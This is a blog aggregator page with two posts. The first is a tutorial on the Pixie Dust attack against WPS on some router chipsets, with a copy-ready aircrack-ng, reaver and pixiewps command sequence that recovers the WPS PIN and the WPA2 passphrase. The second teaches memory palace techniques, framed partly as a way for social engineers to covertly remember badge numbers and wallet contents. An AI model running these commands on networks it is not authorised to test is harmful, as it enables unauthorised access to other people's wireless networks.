Social Engineering Blogs

An Aggregator for Blogs About Social Engineering and Related Fields

How To Crack WPS with Pixie Dust … Offline Attacking

In this post we are looking at how vulnerable WPS makes your Access Point. WiFi Protected Setup makes it nice and easy for you to connect to your wireless devices by using a simple pin number, instead of your hard to guess passphrase. The issue is that this means your secure 32 character passphrase is about as much use a chocolate fireguard, as instead of taking potentially years to crack, you can attack the pin number which only has 11,000 iterations and this can be cracked in hours (even with timeouts and other controls in place).

In this video we will show how a vulnerability in some of the chipsets of Wireless Access Points allows you to crack the WPS code in less than a second as well as revealing the WPA pin number. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.

The way this works is that the Enrollee Hashes (E-Hash1 / E-Hash2) are supposed to be secret hashes, but when they are disclosed we can use them along with the Enrolle and Registrar Public Keys, along with the E & R Nonces and the Auth Key to decipher the WPS PIN Key.

Just to provide some comparison, using the WPS PixieDust attack we got the PIN and then the WPA2 Passphrase in less than a second. Stealing the WPA2 Hash and attacking this directly with a single GPU the time estimated to crack based on knowing its Alpha Numeric with no special characters is 853,399 days, 2 hours and 44 minutes, so year WPS add some weakness to your hardened access point :)

Below is the code used during the above video, you can use this easily copy and paste with your own information.

iwconfig

airmon-ng start wlan1

airmon-ng check kill

airodump-ng wlan1mon –wps

reaver -i wlan1mon -c -b -vv

pixiewps -e -r -s -z -a -n

reaver -i wlan1mon -c -b -vv -K 1

If you are looking to do this on Ubuntu and not Kali, you will need the following packages (cheers Matt):

apt-get install install build-essential libnl-3-dev libnl-genl-3-dev

wget http://download.aircrack-ng.org/aircrack-ng.1.2-rc2.tar.gz

git clone https://github.com/t6x/reaver-wps-fork-t6x

git clone https://github.com/wiire/pixiewps

Finally, in the WPS column you need to be checking for one of the following to make sure the Access Point has WPS enabled, if it isnt its not supported on the device, or you have successfully disabled it. 1.0, LAB, PBC, NFC, PIN,

Remember Remember … Constructing A Memory Palace

So today is the Royal Wedding, and I am sure of you hadn’t forgotten that. However as we have discussed before the memory isn’t really the best at remembering stuff, and our subconscious is only to happy to fill in the gaps with made up information to make us feel better :)

There are some individuals with mad memory retention though, Ben Pridmore, Boris Conrad and Wang Feng to name a few are world memory champions. The interesting thing is that all of us have this amazing ability to some extent, we just need a method to follow and like any skill we need to practice it.

So why is a good memory retention of benefit to you a social engineer? Well in my opinion it is very useful. One of the key skills of social engineering is being able to see the big picture and think of your feet. Sure you can use a pen and paper, but this isn’t always practical and not exactly covert. Do you not think it would be of benefit to remember badge numbers, items you see in wallets and bags, peoples names, etc that you see as your completing your engagement, as well as all the prep work.

I had heard about these memory techniques, especially in relation to magic and mentalism, however it wasn’t until I read Derren Brown’s Tricks of the Mind that I found a method that it appears I was already using to some extent but I have now developed further. This method is the loci system, simply put this method works by associating images in places you are familiar with in real life, along a route you can easily recall and associated. The loci mnemonic is often referred to as a memory palace, due to the fact you could construct a virtual palace in your mind (perhaps based on your house) and have a defined route that you can place objects on.

My personal memory palace is my local Tesco store. I have a set route when I go shopping, and its a large store with lots of space for storage, I literally have shelves of space to remember stuff. I am by no means an expert, but I am certainly better at remembering using this method than I have been in the past.

There are a few books on this subject, and I will mention these at the end. For now I will summarise how you can go about building your own memory palace, then you can try it out and perhaps save yourself a few quid on books.

First things first, to have an effective memory palace you need a decent foundation. So you need to construct in your mind your palace of choice, this could be completely fictional, however there is no doubt a real environment you know well and visualise will be much easier to utilise. You can always change and grow your memory palace, so I suggest you start of with just a room to start of with, you furniture etc, so you have somewhere to store your visual memory items.
Next you need to define how you get around. A memory palace is going to be difficult to easily recall and access information if its all over the shop, so you need a defined repeatable route (this is why the supermarket is good for me as I do the same aisles each time in a certain order) of how you travel through your memory palace, what objects you pass etc.
Now we have the foundations in place, and the route we will take around our memory palace, now we need to furnish the environment. You don’t need to use actual furniture, but it should be distinct and easy to identify and different from each other. So if initially you want to remember 10 things, you should allocate 10 different pieces of furniture so you have somewhere to place the memories. I recommend you put in as much as you can so you have room for growth in that room, and you can then add other rooms with other distinct furniture (you don’t want them to be the same as this will add confusion).
Now its all built up in your mind its time to remember everything in real detail. Do a decent amount of laps around your route, remembering all the furniture, its order on the route, really commit to it, imagine the colours, smells, what it feels like, as much detail as possible. If you have decided to completely make this up, you may want to draw a blueprint of some kind, to really help you visualise and commit everything to memory. Spend some time here, and come back often, as this is an important part of developing your memory palace.
Good to go. Hopefully now everything is in place, so now you can try it out. A good thing I find to test yourself, that isn’t super critical is your shopping list. Give yourself a reasonable test so more than 10 items, go for 20 on your first outing (make sure you have the furniture to accommodate). So place each item on you shopping list on a piece of furniture in your memory palace, circle around your route a couple of times, then head out and test it. It does not always need to be the actual item, it could be a symbol of something bigger that will trigger another memory to remind you.
Rinse and Repeat. For things you want to commit to longer term memory (perhaps an engagement in a few weeks) take some time to really explore your memory palace and be creative with what you use to trigger those memories, the more wacky the better sometimes. The more familiar you become with your palace the more memorable it will be and as a result more effective.
Getting comfortable. As you get more familiar with your palace you will find it grows and become more valuable, and you will use it for all sorts of things. You will also find you can start at any point on your route, so you don’t always need to start from point one on the router, you could kick off from point 5.
Monopoly. We have mentioned already about adding new rooms and expanding your palace is possible and encouraged, however you may have a reason to really segment your memories. In this case get yourself an additional palace, and add it to the road of memory palaces you may want to acquire over time. The process for setting up another memory palace is always the same, just remember to setup a route from one palace to another.

Hopefully you found this post of interest and your going to give it a shot. If you are dubious about the success you will have, I would like to ask you to recall the last time you left your keys somewhere, what did you do? If like most people you recalled your steps (route) that you took recently, and as if by magic you are able to focus the area of where to look. This is very similar, just alot more focused and dedicated for a purpose.

The Memory Book – Harry Lorayne
Tricks Of The Mind – Derren Brown
The Memory Palace of Matteo Ricci – Jonathan Spence
Chambers For A Memory Palace – Donlyn Lyndon
Max Your Brain – James Harrison
How To Be Clever – Ben Pridmore